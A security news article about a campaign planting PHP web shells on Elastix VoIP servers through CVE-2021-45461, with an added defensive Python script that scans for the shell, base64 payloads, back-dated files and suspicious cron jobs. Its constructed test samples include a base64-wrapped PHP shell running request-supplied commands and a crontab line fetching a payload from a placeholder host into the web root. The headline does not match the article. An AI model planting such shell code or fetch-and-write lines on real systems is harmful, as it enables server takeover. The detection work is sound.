
Hackers pose as journalists to further their espionage operations

Threat analysts have uncovered a large-scale campaign targeting Elastix VoIP telephony servers with more than 500,000 malware samples over a period of three months.

Elastix is a server software for unified communications (Internet Protocol Private Branch Exchange [IP PBX], email, instant messaging, faxing) that is used in the Digium phones module for FreePBX.

The attackers may have exploited a remote code execution (RCE) vulnerability identified as CVE-2021-45461, with a critical severity rating of 9.8 out of 10.

Adversaries have been exploiting this vulnerability since December 2021 and the recent campaign appears to be connected to the security issue.

Security researchers at Palo Alto Networks’ Unit 42 say that the attackers’ goal was to plant a PHP web shell that could run arbitrary commands on the compromised communications server.

In a report on Friday, the researchers say that the threat actor deployed “more than 500,000 unique malware samples of this family” between December 2021 and March 2022.

The campaign is still active and shares several similarities to another operation in 2020 that was reported by researchers at cybersecurity company Check Point.

Attack details

The researchers observed two attack groups using different initial exploitation scripts to drop a small shell script. That script installs the PHP backdoor on the target device, creates root user accounts, and ensures persistence through scheduled tasks.

One of the two scripts used for initial compromise (Palo Alto Networks)

“This dropper also tries to blend into the existing environment by spoofing the timestamp of the installed PHP backdoor file to that of a known file already on the system,” note the security researchers.

The IP addresses of the attackers from both groups are located in the Netherlands, while DNS records reveal links to several Russian adult sites. Currently, parts of the payload-delivery infrastructure remain online and operational.

The scheduled task created by the first script runs every minute to fetch a base64-encoded PHP web shell, which handles the following parameters in incoming web requests:

  • md5 – MD5 authentication hash for remote login and web shell interaction.
  • admin – Select between an Elastix and a FreePBX administrator session.
  • cmd – Run arbitrary commands remotely.
  • call – Start a call from the Asterisk command line interface (CLI).

The web shell also features an additional set of eight built-in commands for file reading, directory listing, and reconnaissance of the Asterisk open-source PBX platform.
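The three behaviours the article attributes to this campaign (a PHP file that reads the md5/admin/cmd/call request parameters, base64 wrapping of the payload, and a dropped file whose modification time has been copied from a legitimate file) each leave something a defender can check for. The script below is an added example written for this page; it is not Unit 42's or BleepingComputer's code and uses none of the report's real indicators. The regular expressions are heuristics, the sample PHP and crontab text are constructed test data, and the file path under the temporary directory is hypothetical. The timestamp check relies on Linux semantics: copying an mtime with `touch -r` does not stop the kernel from setting ctime to the current time, so a file whose mtime is far older than its ctime was recently written or re-stamped.

```python
"""Triage helper for Elastix/FreePBX hosts (added example, not from the original report)."""
import base64
import binascii
import os
import re
import tempfile
import time

# Request parameters the article says the web shell honours.
SUSPECT_PARAMS = ("md5", "admin", "cmd", "call")
PARAM_RE = re.compile(
    r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[\s*['\"](%s)['\"]\s*\]" % "|".join(SUSPECT_PARAMS))
DANGEROUS_RE = re.compile(r"\b(eval|system|shell_exec|passthru|exec|popen|proc_open)\s*\(")
B64_RE = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")          # long base64 runs
EVERY_MINUTE_RE = re.compile(r"^\s*\*\s+\*\s+\*\s+\*\s+\*\s+(.*)$")
FETCH_RE = re.compile(r"\b(curl|wget)\b.*\b(php|base64)\b")

# Constructed sample: a loader that evals a base64 blob containing the parameter handling.
_INNER = ("if (md5($_REQUEST['md5']) !== $key) { exit; }\n"
          "$admin = $_REQUEST['admin'];\n"
          "if (isset($_REQUEST['cmd'])) { echo shell_exec($_REQUEST['cmd']); }\n"
          "if (isset($_REQUEST['call'])) { system('asterisk -rx ' . escapeshellarg($_REQUEST['call'])); }\n")
SAMPLE_LOADER = "<?php eval(base64_decode('%s'));\n" % base64.b64encode(_INNER.encode()).decode()

# Constructed sample crontab; the host name is a placeholder, not a real indicator.
SAMPLE_CRON = """# constructed sample
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
* * * * * wget -q -O - http://payload-host.invalid/update.php | base64 -d > /var/www/html/x.php
"""


def decode_blobs(src):
    """Decoded text of every long base64 run in src; runs that fail to decode are skipped."""
    out = []
    for m in B64_RE.finditer(src):
        try:
            out.append(base64.b64decode(m.group(0), validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            pass
    return out


def score_php_source(src):
    """Findings for one PHP source string, looking through one layer of base64."""
    layers = [src] + decode_blobs(src)
    params = sorted({m.group(1) for layer in layers for m in PARAM_RE.finditer(layer)})
    calls = sorted({m.group(1) for layer in layers for m in DANGEROUS_RE.finditer(layer)})
    return {
        "params": params,
        "dangerous_calls": calls,
        "base64_payload": len(layers) > 1,
        # Most of the shell's parameters plus a command-execution primitive is the signal.
        "webshell_like": len(params) >= 3 and bool(calls),
    }


def timestamp_spoofed(path, tolerance=3600):
    """True when mtime is older than ctime by more than tolerance seconds.
    A back-dated mtime with a recent ctime means the file was written recently
    and then re-stamped. Linux semantics; on Windows st_ctime is creation time."""
    st = os.stat(path)
    return (st.st_ctime - st.st_mtime) > tolerance


def suspicious_cron_lines(crontab_text):
    """Every-minute cron entries that pull PHP or base64 content with curl/wget."""
    hits = []
    for line in crontab_text.splitlines():
        m = EVERY_MINUTE_RE.match(line)
        if m and FETCH_RE.search(m.group(1)):
            hits.append(line.strip())
    return hits


def audit_tree(root):
    """Walk root and report PHP files that look like the described web shell or were re-stamped."""
    report = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = score_php_source(fh.read())
            findings["timestamp_spoofed"] = timestamp_spoofed(path)
            if findings["webshell_like"] or findings["timestamp_spoofed"]:
                report.append((path, findings))
    return report


def demo():
    """Write the constructed sample into a temp dir, back-date its mtime, and audit it."""
    root = tempfile.mkdtemp()
    path = os.path.join(root, "admin", "x.php")   # hypothetical location
    os.makedirs(os.path.dirname(path))
    with open(path, "w") as fh:
        fh.write(SAMPLE_LOADER)
    old = time.time() - 400 * 86400              # copied from a year-old file, as the dropper does
    os.utime(path, (old, old))                   # sets mtime; the kernel moves ctime to now
    return audit_tree(root)


if __name__ == "__main__":
    for path, findings in demo():
        print(path, findings)
    print(suspicious_cron_lines(SAMPLE_CRON))
```

Run it against a web root and the crontabs of root and the web server user; a hit on the timestamp check alone is worth a look even when the content heuristics are quiet, since the dropper's whole point is to make the file look old.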

The report from Unit 42 includes technical details on how the payloads are dropped and on the tactics used to avoid detection in the existing environment. It also provides a list of indicators of compromise covering the local file paths the malware uses, unique strings, hashes of the shell scripts, and the public URLs that host the payloads.

Source: https://www.bleepingcomputer.com/news/security/massive-campaign-hits-elastix-voip-systems-with-500-000-unique-malware-samples/
